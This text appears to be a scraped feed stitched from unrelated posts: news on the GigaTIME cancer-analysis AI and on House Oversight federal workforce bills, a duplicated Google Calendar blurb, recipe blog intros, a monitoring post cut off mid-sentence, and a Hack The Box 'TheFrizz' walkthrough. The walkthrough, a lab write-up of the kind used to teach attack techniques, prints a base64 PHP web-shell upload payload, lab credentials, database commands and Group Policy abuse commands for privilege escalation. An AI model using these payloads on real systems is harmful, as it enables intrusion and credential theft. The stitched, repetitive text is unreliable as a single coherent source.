Pacific Northwest tech and cancer researchers are publicly releasing an AI tool that can perform sophisticated tumor analysis in a fraction of the time and cost of existing methods, potentially making cutting-edge cancer insights available to far more patients.
The GigaTIME model uses artificial intelligence to virtually generate detailed immune system data from standard pathology slides β analysis that would normally require days of lab work and thousands of dollars per sample.
The breakthrough could accelerate the shift toward precision medicine, where treatments are tailored to each patientβs specific cancer biology, said Hoifung Poon, general manager of Microsoft Researchβs Real-World Evidence program.
Traditional pathology slides show tumor and immune cells but offer limited insights into whether a patientβs immune system is actively fighting cancer. A more sophisticated technique called multiplex immunofluorescence (mIF) analysis peers closely into the tumorβs microenvironment, adding information about whether immune cells are working based on which proteins are present.
But mIF analysis βjust for one sample, could easily take days and cost thousands of dollars,β Poon said, severely limiting its use in routine care.
GigaTIME bypasses that bottleneck by generating the information virtually by simply analyzing standard pathology slides.
βGigaTIMEΒ is about unlocking insights that were previously out of reach,β said Dr. Carlo Bifulco, chief medical officer of Providence Genomics and a medical director at the Providence Cancer Institute.
The project brings together researchers from Microsoft; Providence facilities in Renton, Wash., and Portland; and the University of Washingtonβs Paul G. Allen School of Computer Science and Engineering. Theyβre publishing a peer-reviewed study today in the journal Cell and releasing the tool online for free on Hugging Face, GitHub and Microsoft Foundry.
Last year the three institutions released GigaPath, a model for diagnosing cancer.
The initiatives are part of the Seattle-areaβs growing efforts to integrate complex health datasets using AI to facilitate advances in medicine. The Allen Institute last month released the Brain Knowledge Platform for neuroscience research, while biotech startup Synthesize Bio has built tools for designing experiments and predicting their outcomes using publicly available data. And the Fred Hutch Cancer Center helped produce a privacy-protecting, data-sharing model through the Cancer AI Alliance.
The scale of the GigaTIME project is giant:
Poon has even bigger ambitions that include blending together data gleaned from cell and biopsy samples plus CT radiology reports, MRIs and other diagnostics to create a more holistic picture of a patient. These advanced models could potentially offer predictions about how a disease might progress or respond to treatment.
The new tools could one day help curb the massive costs and time associated with clinical trials by providing better insights for selecting drug candidates and designing studies.
The goal is making advanced cancer care both more effective and more widely accessible.
βIβm personally biased, but I think there canβt be a more exciting time than right now,β Poon said, pointing to the convergence of AI capabilities and digital medical records as βtwo really powerful forces.β
Authors of the paper βMultimodal AI generates virtual population for tumor microenvironment modelingβ are Jeya Maria Jose Valanarasu, Hanwen Xu, Naoto Usuyama, Chanwoo Kim, Cliff Wong, Peniel Argaw, Racheli Ben Shimol, Angela Crabtree, Kevin Matlock, Alexandra Q. Bartlett, Jaspreet Bagga, Yu Gu, Sheng Zhang, Tristan Naumann, Bernard A. Fox, Bill Wright, Ari Robicsek, Brian Piening, Carlo Bifulco, Sheng Wang and Hoifung Poon.
Lawmakers on the House Oversight and Government Reform Committee have advanced a slew of federal workforce bills, one of which aims to make some significant changes to the federal probationary period.
The GOP-led EQUALS Act was one of about a dozen bills that passed favorably out of the committee on Tuesday. If enacted, it would require new federal employees to serve a two-year probationary period, doubling the length that most newly hired or promoted currently face.
Under the bill, agencies also would have to actively certify that a probationary employee βadvances the public interestβ before the employee can become officially tenured, while those who are not certified would be removed from their jobs. The legislation advanced in a party line vote of 24-19.
Rep. Brandon Gill (R-Texas), who introduced the legislation, said the EQUALS Act builds on an April executive order from President Donald Trump, which similarly required agencies to review and actively sign off on probationary workersβ continued employment.
βPresident Trump could not be more right,β Gill said. βProbationary periods and trial periods are long-standing, essential tools to ensure newly hired federal employees are sufficiently performing before their appointments are finalized permanently.β
Democrats on the committee criticized the Republicansβ bill, arguing that extending the length of the probationary period would negatively impact federal recruitment, as well as open the doors to more terminations of new hires in the government.
βThis bill would double the time during which federal employees have limited due process and appeal rights as probationary employees. During this time they could be fired within 30 daysβ notice, they have limited rights to an attorney or representative and they generally cannot appeal their removal,β Oversight Committee Ranking Member Robert Garcia (R-Calif.) said Tuesday. βAt a time when Donald Trump is attempting illegal mass firings and purging experts from agencies across our government, this bill is a dangerous step in the wrong direction.β
Rep. James Walkinshaw (D-Va.) added that the EQUALS Act would βgive the Trump administration yet another tool to weaponize against federal employees who they perceive as ideological threats, and to continue efforts to destroy the non-partisan civil service.β
Gill, however, argued that the bill would not lead to mass terminations, but instead only make sure that new federal employees are carefully reviewed. He also pointed to a 2015 report from the Government Accountability Office, as well as a 2005 report from the Merit Systems Protection Board, both of which call for reforms to the probationary period.
βAn employee can often work for the federal government for over 25 years,β Gill said. βHaving an extra year of probationary status to ensure the right employee becomes tenured is a common sense, good government measure.β
During the committee meeting, Rep. Stephen Lynch (D-Mass.) motioned to strike the EQUALS Act and replace it with legislation to first require GAO to review effects of prior probationary period extensions before making any long-term changes. Lynchβs amendment was struck down by the committeeβs Republican majority.
Committee Republicans also advanced a bill that would require agencies to report in greater detail the use of official time by federal employees governmentwide. The Official Time Reporting Act passed out of the committee in a vote of 24-19 along party lines.
If enacted, the bill would require all agencies to submit reports on how much official time is used in each fiscal year, and justify any potential increases in official time that may occur.
During the committee meeting, Republican lawmakers argued that official time takes away from employeesβ job responsibilities. Rep. Virginia Foxx (R-N.C.), the lead co-sponsor on the bill, also criticized the lack of agenciesβ reporting on official time over the last several years.
The bill βwill let the American people know exactly how much of their hard-earned money is spent not providing valuable service, but on federal employee union activities,β Foxx said.
Some committee Democrats, however, described the legislation as an attack on union rights. The lawmakers emphasized that official time is used for activities that support federal employees, while raising concerns about the possibility that the bill could let the Trump administration further limit union rights.
βThis year under the Trump administration, federal employees have faced job insecurity, financial strain and the loss of collective bargaining agreements. This bill will make matters worse,β Rep. Maxwell Frost (D-Fla.) said. βWe all benefit when unions and their members are empowered to prevent and address retaliation, discrimination and sexual harassment.β
Generally, official time hours can go toward negotiating union contracts, meeting with management, filing grievances or representing employees dealing with management disputes. Under law, federal unions are allotted specific amounts of time and resources to conduct these activities.
Federal unions, including the American Federation of Government Employees, have pushed back against the Trump administrationβs characterization of official time as βtaxpayer-funded union time,β calling it a misrepresentation.
During Tuesdayβs meeting, Garcia argued that official time leads to lower staff turnover and higher employee morale, while also preventing potential legal costs down the road.
βOfficial time is work time that employees are allowed to use for making the workplace safe and protecting workers from discrimination or harassment,β he said.
In contrast, some legislation that the committee approved on Tuesday gained strong bipartisan support from lawmakers. That includes bills on training for federal supervisors, skills-based hiring of federal contractors and amending the system for relocation payments for federal employees.
The Federal Supervisor Education Act, for instance, unanimously advanced out of the Oversight committee in a vote of 43-0. If enacted, the legislation would require agencies to work with OPM to create training programs for newly hired or promoted agency managers and supervisors.
Rep. William Timmons (R-S.C.), who introduced the legislation in October, argued during Tuesdayβs meeting that many federal supervisors step into leadership roles without enough training, and with no clear expectations for how to adjust to a managerial role in government.
βAgencies promote strong technical employees into supervisory jobs, and then send them in blind,β Timmons said. βThat leads to low productivity, uneven standards and a system where good employees feel unsupported and bad employees rarely face consequences.β
Timmons added that the legislation would result in βreal, meaningful training,β rather than being βa slideshow or a checkbox exercise.β
Although he said he mostly agreed with the billβs intentions, Walkinshaw proposed striking one provision of the legislation. The initial bill text included a requirement that supervisory training programs must include additional training on the probationary period β something that Walkinshaw argued was outside the billβs scope.
Committee Republicans agreed to adopt Walkinshawβs amendment, after saying that it would result in stronger bipartisan support for the bill. Ultimately, the legislation advanced unanimously, with the amendment included.
βI am a strong supporter of the goal of this legislation,β Walkinshaw said. βAlmost all of the language will provide supervisors within the federal workforce the appropriate training and resources to ensure there are strong leaders within their respective agencies.β
The post Committee Republicans advance House bill to overhaul the federal probationary period first appeared on Federal News Network.
Β© AP Photo/Mariam Zuhaib
The House Oversight and Government Reform Committee is convening Tuesday morning to mark up a slew of bills, many of which would impact the federal workforce in one way or another.
Tuesdayβs meeting will be the first legislative markup session the committee has held in nearly two months, with the last being prior to the 43-day government shutdown. Any bills that the committee approves during the markup will advance to the full House for further consideration.
Lawmakers are expected to consider bills covering everything from whistleblower protections and skills-based hiring for federal contractors, to relocation incentives for federal employees.
Several other legislative changes may be on the horizon as well. Here are three key bills up for the committeeβs consideration that may bring significant changes for the federal workforce:
One Republican-led bill, introduced by Rep. Brandon Gill (R-Texas) in October, aims to cement many of the changes the Trump administration has made to the governmentβs rules for the probationary period in the federal workforce.
If enacted, the so-called EQUALS Act would require most new federal employees to serve a two-year probationary period β a time in which employees have limited appeal rights and are easier to remove, before their employment in the federal workforce can be solidified.
Part of the bill would compel agencies to evaluate their employees regularly throughout the federal probationary period. And in the last 30 days of that two-year period, agencies would have to certify β and get the Office of Personnel Management to approve β that the probationary employee βadvances the public interest,β before the employee can become tenured.
Any probationary employees who are not actively certified by their agency would be terminated, according to the GOP-led legislation.
The bill also states that when making a decision on whether to keep a probationary employee, agencies can additionally consider performance and conduct; the βneeds and interestsβ of the agency; and whether the employee would advance βorganizational goalsβ or βefficiency.β
The EQUALS Act aligns with efforts from the Trump administration earlier this year to overhaul the rules for the governmentβs probationary period. In April, President Donald Trump called for the creation of βCivil Service Rule XI,β which similarly required agencies to review and actively sign off on probationary workersβ continued employment before they can be moved out of a probationary period.
Trumpβs executive order also expanded the reasons that probationary period employees can be fired. In June, OPM further clarified that probationary employees can be terminated based on broader reasons than the previous limitations set only to performance or conduct.
The House bill also comes after the Trump administration fired tens of thousands of probationary employees earlier this year, stating that the removals were due to βpoor performance.β But in September, a federal judge found that OPM unlawfully directed the mass probationary firings. The judge ordered agencies to update employeesβ personnel files to reflect that their firings were not due to performance or misconduct.
A separate bill teed up by Republicans would compel agencies to provide much more detail on federal union representativesβ use of official time to both Congress and the public on an annual basis.
The Official Time Reporting Act from Rep. Virginia Foxx (R-N.C.) would require all agencies to submit reports on how much official time is used in each fiscal year, and justify any potential increases in official time that may occur.
The legislation would then require OPM and the Office of Management and Budget to create and send a joint report to Congress, and make publicly available online, the details of official time governmentwide. Those reports would have to cover how much official time each federal employee used, as well as provide data on official time hours calculated against the total number of bargaining unit employees for an βofficial time rate.β
Under the GOP-led legislation, those annual reports would additionally have to detail the specific purpose of all official time, the amount of money withheld for union dues, the cost of pay and benefits for all employees while they are on official time, and the office space and resources union representatives use while on official time.
Generally, official time refers to on-the-clock hours that go toward work such as negotiating union contracts, meeting with management, filing complaints or grievances against an agency, or representing employees who are dealing with disciplinary actions or other management disputes. Federal unions are allotted, by law, specific and limited amounts of agency time and resources to conduct activities on official time.
Official time by union representatives has been a major target of the Trump administration this year. Some agencies have either reduced or fully removed official time options, in response to executive orders from Trump calling for the termination of collective bargaining at the majority of executive branch agencies.
The administrationβs actions have received major pushback from federal unions such as the American Federation of Government Employees, which said OPMβs characterization of official time as βtaxpayer-funded union timeβ is false and stigmatizing.
During Tuesdayβs markup, Oversight committee lawmakers also plan to consider legislation that would require a mandatory training program all managers and supervisors across the federal workforce would have to take.
Under the Federal Supervisor Education Act, which Rep. William Timmons (R-S.C.) introduced in October, agencies would have to work with OPM to create training programs for agency managers, with at least some modules focused on goals like performance management, employee engagement and productivity.
The bill would also require the training programs to cover how supervisors should manage employees who have βunacceptable performance,β as well as how to make use of the probationary period. The bill also mandates that managers and supervisors receive training on how to address reports of harassment, prohibited personnel practices, employee rights, and more.
The legislation emphasizes that agencies should use βinstructor-basedβ training as much as practicable. If enacted, supervisors would have to complete the training within one year of being appointed to a supervisory role, and would have to retake the trainings at least once every three years following that.
The Republican-led effort comes after OPM launched two federal workforce training programs for senior executives in November, incorporating common themes from the Trump administration on βaccountability,β performance management and adherence to the presidentβs priorities.
Although both new programs are optional, OPM still told agencies to βset the expectationβ that all career Senior Executive Service members should at least complete training modules on βreturning to founding principlesβ and βimplementing administration prioritiesβ within the next year.
In the Oversight committee meeting Tuesday, all three federal workforce bills, along with many others, will be up for consideration and potential advancement in the House.
The post 3 federal workforce bills to watch in House Oversight Committee markup first appeared on Federal News Network.
Β© Getty Images/bpperry
Google Calendar now lets you block time for Google Tasks with busy status, auto-decline, and DND settings, making deep work easier and more intentional.
The post New Google Calendar Update Makes Deep Work Easier Than Ever appeared first on TechRepublic.
Google Calendar now lets you block time for Google Tasks with busy status, auto-decline, and DND settings, making deep work easier and more intentional.
The post New Google Calendar Update Makes Deep Work Easier Than Ever appeared first on TechRepublic.
After sharing many air fryer chicken recipes, why am I calling this one the best ever juicy air fryer chicken? Thatβs simply because this juicy air fryer chicken turned out way better than my expectations even with a minimal set of ingredients!
If you are looking for a quick & easy recipe which is high in protein and can fit into your busy weekday schedule, then this juicy air fryer chicken is the one that you are looking for!
Let me tell you the story of how I discovered this phenomenal recipe!
I use my air fryer daily to whip up my weekday dinners, which is mainly protein & salad on the side, as it hardly requires any prep and then everything is taken care of by the trusty air fryer.
So I keep playing up with the flavors, sometimes barely adding any spice; just aromatics & seasonings!
During one such experiment, this juicy air fryer chicken materialized when I was racing against time to join the next meeting!
So all I could add to the marinade, other than aromatics, were only turmeric & red chilli powder! I was okay with it as it was just one of my daily weekday dinners and nothing fancy or blog-worthy!
But I turned out to be so wrong!
The yogurt marinated chicken thighs came out so tender, juicy and flavorful even though I didn't use too many spices, that I was shook as soon as I took my very first bite!
I instantly asked my better half too to do a taste test and he also got hooked to the juiciness of the chicken! So I was not biased, you see! LOL!
Hence it goes without saying that this juicy air fryer chicken must feature in our blog as I canβt deprive my readers of such a mind-blowing recipe!
The post Best Ever Juicy Air Fryer Chicken | Indian Style Air Fryer Chicken Thighs for Weight Loss first appeared on Flavor Quotient.
Crispy, crunchy, spicy and oh-so-delicious, these air fryer fried chicken presents themselves with all the glory of a classic crispy fried chicken but without the guilt of deep frying in loads of oil!
I canβt explain how happy I was when these crispy fried chicken came out of my air fryer for the very first time!
I was literally holding my breath and praying to the Air Frying God for churning out perfectly crispy chicken so that I can finally restart to enjoy this favorite chicken of mine without that load of guilt!
Thankfully my prayer was answered and I got a basket of freakingly unbelievable crispy air fryer fried chicken which are super crispy on the outside and juicy & succulent inside!
After I took my first bite, I simply stood there speechless looking at the crispy chicken in my hand and wondering which evil force had stopped me from trying this crazy delicious air fryer fried chicken until now?
What is Air Fryer Fried Chicken?
To put it simply, air fryer fried chicken is your same addictive takeaway style crispy fried chicken but instead of being deep fried in loads of oil, it is air fried with just sprays of oil!
But if you are worried that these air fryer fried chicken will not come out as addictive and as crunchy as the deep fried alternative, you are utterly mistaken my friend!
I insist you try making these crispy fried chicken in your air fryer as soon as you can and I can guarantee that you will come back here to thank me!
After going through many recipes of how to make crispy fried chicken in an air fryer, this recipe of air fryer fried chicken from Gimme Delicious struck the right chord with me.
I made these first to see if they really come out that crispy which sweeps us off our feet with their crazy crunch without being dry or chewy inside.
And you know what the outcome was if you have read this blog from the top! So, this recipe of air fryer fried chicken is a keeper which you can enjoy as a high protein meal, but occasionally!
The post Best Ever Air Fryer Fried Chicken | Healthier Takeaway Style Crispy Fried Chicken first appeared on Flavor Quotient.
Being a daily consumer of chia seeds, I had to try this viral Tiramisu chia pudding to see if itβs worth all the hype at all! So I tried it and, lo behold, it is so damn good that I have to now repeat it frequently!
If you ask me to name one dessert among the universe of all desserts that I can have without thinking twice then that has to be a classic Italian Tiramisu!
But yes, that will be in a parallel universe where I wouldnβt worry about consuming excess calories that come free of cost with the delicious taste of a generous serving of Tiramisu!
With all that love and affection towards Tiramisu, I also jumped into the bandwagon of a spin-off of Tiramisu made with the cult favorite of all fitness enthusiasts these days!
Chia seeds! So here I present my version of the viral Tiramisu chia pudding!
What is Tiramisu chia pudding?
If you love to watch cooking/recipe videos, I am sure you have come across this viral recipe in your feed many times already!
Just in case this is something new to you and I have the privilege to introduce you to this current social trend, then let me decode it for ya!
First, letβs see what Tiramisu is and then we can figure out its connection with the Tiramisu chia pudding!
A classic Tiramisu has multiple layers of classic lady finger biscotti soaked in freshly brewed coffee with alternating thick layers of whipped up mascarpone cheese in between two layers of lady fingers.
The final layer of mascarpone is dusted with a generous amount of cocoa powder. Then the assembled Tiramisu is chilled in the refrigerator overnight to set things up.
This also allows the flavors of coffee and cocoa to mingle with each other resulting into a mind-blowing no-bake dessert making you fall in love with it instantly!
The post Viral Tiramisu Chia Pudding for Weight Loss Friendly Breakfast | How to Make Tiramisu Chia Pudding first appeared on Flavor Quotient.
After using an air fryer for more than three years now, itβs a shame that I havenβt tried making air fryer chicken stir fry yet! So without any further delay, here is my fail-proof air fryer chicken stir fry recipe thatβs perfect for your high protein weight loss meal while also satisfying your craving for stir fry chicken to some extent!
I was an absolute sucker for chicken stir fry! I remember gorging uncountable crispy stir fried chicken bites during my pre-fitness era without even batting an eyelid about the calorie consumption!
Now that I am way too mindful of what I eat, itβs pretty much impossible for me to indulge in those deep fried items irrespective of how delicious they are!
If you are also in a similar journey like mine, I have a solution to curb our cravings for those crispy chicken stir fry!
And that perfect solution is nothing but my crispy air fryer chicken stir fry which fits right into the high-protein meal that we all fitness enthusiasts aim for!
What is air fryer chicken stir fry?
I agree that the name air fryer chicken stir fry is kind of an oxymoron! I know we are not stirring anything here as everything is getting done on its own inside the air fryer!
But the term βstir fryβ invokes that irresistible craving which is quite difficult to ignore and this air fryer chicken stir fry flawlessly satisfies that temptation simply by replicating the same crispy chicken but without the truckload of oil!
Quick tip: Just so you know that excess oil is the hidden culprit in our food which we tend to overlook and then wonder why we are not losing body fat even after having balanced meals!
The post Easy Air Fryer Chicken Stir Fry | How To Stir Fry Chicken in Air Fryer first appeared on Flavor Quotient.
In this write-up, we will explore the βTheFrizzβ machine from Hack The Box, categorised as a medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the βTheFrizzβ machine from Hack The Box by achieving the following objectives:
User Flag:
We began by exploiting a file upload vulnerability to gain a web shell on the target. From there, we located the config.php file, which contained database credentials. Using these, we accessed the database locally through mysql.exe, extracted a user hash, and successfully cracked it to obtain the password Jenni_Luvs_Magic23. With these credentials, we logged into the web application and discovered a message detailing an upcoming SSH migration, hinting at Kerberos-based authentication. We generated a Kerberos ticket (f.frizzle.ccache), leveraged it to gain SSH access to the system, and ultimately retrieved the user flag by executing type user.txt.
Root Flag:
After escalating privileges using M.SchoolBus and exploiting the SleepGPO via SharpGPOAbuse, we forced the Group Policy to update with gpupdate.exe /force. We then used secretdump to gather credentials and leveraged wmiexec to gain a root-level shell. From there, we accessed and read the root flag using the command type root.txt.
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Loginnmap -sC -sV -oA initial 10.10.11.60Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/thefrizz]
ββββΌ $nmap -sC -sV -oA initial 10.10.11.60
# Nmap 7.94SVN scan initiated Thu Aug 21 20:57:38 2025 as: nmap -sC -sV -oA initial 10.10.11.60
Nmap scan report for 10.10.11.60
Host is up (0.16s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)Analysis:
This page offers no useful content; the only option available is a Staff Login link located in the upper right corner.
Clicking on the Staff Login redirects to a login page, but we currently do not have valid credentials to proceed with testing.
While examining the framework, I identified it as Gibbon v25.0.00 and found the following three relevant links through online research.
Gibbon v25.0.0 is susceptible to a Local File Inclusion (LFI) vulnerability, allowing attackers to include and expose the contents of various files within the installation directory in the serverβs response. This flaw, identified as CVE-2023-34598, poses a significant risk by potentially revealing sensitive information stored in the affected files.
The proof-of-concept (PoC) for this can be found on GitHub here
However, this LFI is limited to reading non-PHP files, indicating certain restrictions. As shown in the screenshot, we attempted to read gibbon.sql. It appears to be included by default and contains nothing of interest.
Letβs proceed to test this directly on the website.
The page returns blank, which indicates a positive outcome.
It appears promising when viewed in Burp Suite.
We successfully uploaded dark.php to the website using the payload:
img=image/png;dark,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=dark.php&gibbonPersonID=0000000001Although any file type could be used, we tested specifically with dark.php.
We encountered an error upon execution.
The error displayed in the browser was similar to the one shown above.
We proceeded to test for command execution using the uploaded web shell by sending a request to dark.php with the parameter cmd=whoami (e.g., GET /path/to/dark.php?cmd=whoami or via curl http://target/dark.php?cmd=whoami). If successful, the response should display the current web user. If no output or an error is returned, we will try URL-encoding the command, using alternatives like id or uname -a, and verifying that cmd is the correct parameter used in the PHP payload.
We attempted to run a basic Windows reverse shell through the uploaded web shell, but it failed to execute and did not establish a connection.
Switching to a different reverse shell command/payload produced no response, but this outcome is still useful to note.
We successfully obtained a reverse shell connection back to our system.v
Burp Suite shows the connection assigned to the user w.webservice.
Two privileges are enabled, and one is disabled.
After gaining the shell, review the Gibbon configuration file and confirm that the current working directory is within the root of the entire site.
In config.php, we found database credentials indicating an account connected to the database:
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';To avoid using port forwarding, we searched the machine for mysql.exe to interact with the database locally.
After some searching, we located mysql.exe on the machine.
Executing the SQL command above produced no output or effect.
Therefore, we modified the command to include SHOW DATABASES; to verify accessible databases.
We executed:
.\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 --database=gibbon -e "SHOW TABLES;"The output listed several tables, including gibbonperson.
I then focused on the retrieved hash and attempted to crack it for possible credentials.
The extracted hashes, shown above, were used for the cracking attempt.
The cracking attempt failed due to Hashcatβs βseparator unmatchedβ error, indicating an unrecognized hash format.
The hash format likely needs to follow the example shown earlier, ensuring it matches the expected structure for Hashcat to process correctly.
Cracking the hash revealed the password Jenni_Luvs_Magic23.
Since the web shell didnβt reveal anything useful, we proceeded to log in to the web application using the cracked credentials and began reviewing its contents.
The red option in the upper right corner caught my attention, and after clicking it, the Message Wall section appeared.
One of the messages stated: Reminder that TODAY is the migration date for our server access methods. Most workflows using PowerShell will not notice a difference (Enter-PSSession). If you encounter any issues, contact Fiona or Marvin between 8am and 4pm to have the pre-requisite SSH client installed on your Mac or Windows laptop.
To analyse the environment with BloodHound, we used the command mentioned above.
The user F.frizzle belongs to Remote Management Users, Domain Users, and the Users group.
The user M.schoolbuss is a member of Desktop Admins and Group Policy Creator Owners.
The error βClock skew too greatβ indicates the password is valid, but the local system clock is out of sync, likely running behind the serverβs time.
Even after synchronising the time using ntpdate, the issue persisted, and the connection still failed.
Using the date command to manually adjust the time resulted in the same βClock skew too greatβ error.
Using faketime bypassed the clock skew issue, but the process now appears to be stuck when attempting to establish a session with evil-winrm.
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
Updating the /etc/krb5.conf file also failed to resolve the issue, and the connection remains unsuccessful.
We successfully generated an f.frizzle.ccache Kerberos ticket.
SSH access to the target system was successfully obtained.
We obtained the user flag by executing the command type user.txt.
Privileges Access
An alternative faketime command also worked successfully, as demonstrated earlier.
While exploring the machine, we discovered a ChildItem within the Recycle.Bin folder.
We found two .7z archive files in the Recycle.Bin folder for further analysis.
Move the .7z files to the ProgramData directory to simplify access and analysis.
We were able to transfer files using the nc.cat command, as demonstrated earlier.
The file transfer eventually completes, though it may take a long timeβaround 2 hours in my case, though the duration may vary for others.
The wapt directory contains numerous files and folders.
I noticed a password that has been encoded using Base64.
As a result, I successfully uncovered a password: !suBcig@MehTed!R.
We can identify the potential user accounts as shown above.
We consolidated all the potential user accounts and credentials into a single file for easier reference.
Many users experienced KDC_ERR_PREAUTH_FAILED errors, but one user (frizz.htb\M.SchoolBus) with password !suBcig@MehTed!Rβreturned a KRB_AP_ERR_SKEW error.
As before, we executed the same command, but this time replaced F.Frizzle with M.SchoolBus.
We created a new Group Policy Object and linked it with the command:
New-GPO -Name SleepGPO -Comment "Sleep is good" | New-GPLink -Target "DC=FRIZZ,DC=HTB" -LinkEnabled YesThe command creates a new Group Policy Object (GPO) named SleepGPO with a note saying βSleep is goodβ. A GPO is basically a set of rules or settings that can be applied to computers or users in a network. The command then links this GPO to the main network domain FRIZZ.HTB, making it active and enforcing the rules or settings defined in it.
We uploaded SharpGPOAbuse onto the victimβs machine to prepare for further Group Policy exploitation.
We used SharpGPOAbuse to elevate privileges by modifying the previously created GPO. The command
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "SleepGPO"adds the user M.SchoolBus as a local administrator on targeted machines by leveraging the SleepGPO. Essentially, this allows M.SchoolBus to gain administrative rights across the network through the Group Policy.
The command gpupdate.exe /force is used to immediately apply updated Group Policy settings, ensuring that changes made by tools like SharpGPOAbuse take effect on target machines without waiting for the default refresh interval (typically 90 minutes). This forces a refresh of both user and computer policies, applying any new or modified Group Policy Objects (GPOs) instantly.
The command secretdump was executed to extract credential information from the target system, enabling further enumeration and exploitation.
We leveraged wmiexec to execute commands remotely and gain a root-level shell on the target system.
We obtained the root flag by accessing the root shell and executing type root.txt.
The post Hack The Box: TheFrizz Machine Walkthrough β Medium Difficulity appeared first on Threatninja.net.
If you want an absolute no-fuss recipe that is high in protein, doesnβt take a truckload of effort and fits right into your healthy meal plan while coming out delicious every time, then these oven baked chicken drumsticks are the one for you!
Being a food blogger, I keep looking for stunning yet easily replicable recipes that I can make & share with all my readers who too can make & enjoy homemade food without being stressed!
On that rigor, I sometimes overlook the simplest of recipes that I keep making on repeat for our own meals and thatβs exactly where these oven baked chicken drumsticks come from!
Honestly, I have made these baked chicken drumsticks for my dinner so many times that I donβt even count this as a recipe any more!
It is such a convenient meal to put together that my brain burns minimal mental energy to process and execute this and thatβs why I kept ignoring this humble yet flavorful dish for so long!
Why should you try making these easy & simple Oven Baked Chicken Drumsticks?
I am guessing you have already watched the video of this recipe (apologies for the video lighting which doesnβt justify the real gorgeousness of these oven baked chicken drumsticks!).
So you have already realized how easy this recipe is which makes it such a perfect choice for a busy weekday meal!
As you read below, you will see that you donβt need a fixed set of spices to make these baked drumsticks as attractive as they look in my pictures!
Once you have the aromatic powders ie onion & garlic and the seasoning ie salt & pepper, you already have the basic grammar of flavorful baked chicken in place.
To seal the deal, all you need is the spice mix of your choice e.g. Italian seasoning which is what I had used or any one of the other alternatives that I have mentioned below!
The post Easy Everyday Oven Baked Chicken Drumsticks for Healthy & High-Protein Meal first appeared on Flavor Quotient.
Wanna take your potato wedges a notch up? Try these air fryer sliced potatoes and thank me for it later! These perfectly spiced, crispy yet melt-in-mouth air fryer sliced potatoes are a must try this month!
While scrolling through my social media feed one fine day, I simply got stuck to these air fryer sliced potatoes as they stared at me with their vibrant golden hue!
I instantly rushed to my kitchen, selected equal sized potatoes from the basket, washed, peeled and sliced them up! Then I left them in the refrigerator while I whipped up the spice mix!
Although I got inspired from this recipe of air fryer sliced potatoes, I took the liberty to completely customize the spice blend according to my liking.
And to be honest thatβs the best part of this recipe! You can make it your own very easily!
What are air fryer sliced potatoes?
Making crispy wedges of potatoes in air fryer has become very common and I am sure you have already made them ample times if you own an air fryer.
I have made the air fryer potato wedges long back and have repeated it many times varying the spice mixes.
So it was time to switch things up a bit and thatβs exactly where these air fryer sliced potatoes make their show-stopping appearance!
You slice your choice of potatoes, smear them in oil and your favorite spices and then just shove them into the air fryer!
What can be simpler than this!
Once done, you are rewarded with a plate of bright golden crispy potatoes fresh from your air fryer for all your hard work!
Because here the potatoes are sliced and not wedged, it adds a tad bit more attraction making it a tad bit more irresistible!
The post Air Fryer Sliced Potatoes | How to Air Fry Potato Slices? first appeared on Flavor Quotient.
Crispy, flavorful & oh-so-summary, these panko crusted air fryer zucchini fries with Parmesan scream summer vibes like nothing else! Make these no-fuss zucchini fries in your air fryer and thank the little genie after falling for these crispy veggie bites!
I am amazed to see my social media feed flooded with one after another zucchini recipes! Yes I understand itβs summer and this humble summer veggie is currently in abundance.
So letβs take full advantage of it today! There are uncountable ways to make a mouthwatering recipe using zucchini which never fails to surprise me!
You can grate them to make zucchini breads and fritters, you can make zucchini noodles to make low-carb stir fries with a medley of other vegetables!
Or simply air fry the cubes of zucchini with seasoning & spices to add to the side of your favorite summer grills!
What are air fryer zucchini fries?
So what's my take today with this everyone's favorite summer vegetable?
A crispy and flavorful plate of parmesan crusted air fryer zucchini fries which are proven crowd-pleaser!
The toppings of these air fryer zucchini fries are Japanese style panko breadcrumbs infused with grated parm that become super crispy when baked or air fried.
And that's the USP of these zucchini sticks in my humble opinion! Plus the flavor of freshly grated Parmesan adds cherry on top!
The post Summer Special Air Fryer Zucchini Fries with Parmesan | Crispy Baked Zucchini Fries for Weight Watchers first appeared on Flavor Quotient.
I will start the new year with a simple entry. Specifically, monitoring my own services. As time goes by and you have more and more websites or servers that like to stop working from time to time for various reasons, it is worth monitoring their status. Especially when they are sites or services that provide a cash flow. However, whatever the
If you think air fryers cannot make your breakfast, then this recipe of air fryer omelette will prove you wrong! This air fryer omelette loaded with veggies and melting cheese could be the best thing to have before starting a fulfilling day ahead!
I know I'm obsessed with my air fryer and I really canβt help it! This one gadget has proven to be so valuable to me that it has already outsmarted the combined value of all the other gadgets in my kitchen!
I have already shared about 20 air fryer recipes in my blog till date and this repertoire is going to become even longer with time! If you are in love with your air fryer as much as I am, do tag along!
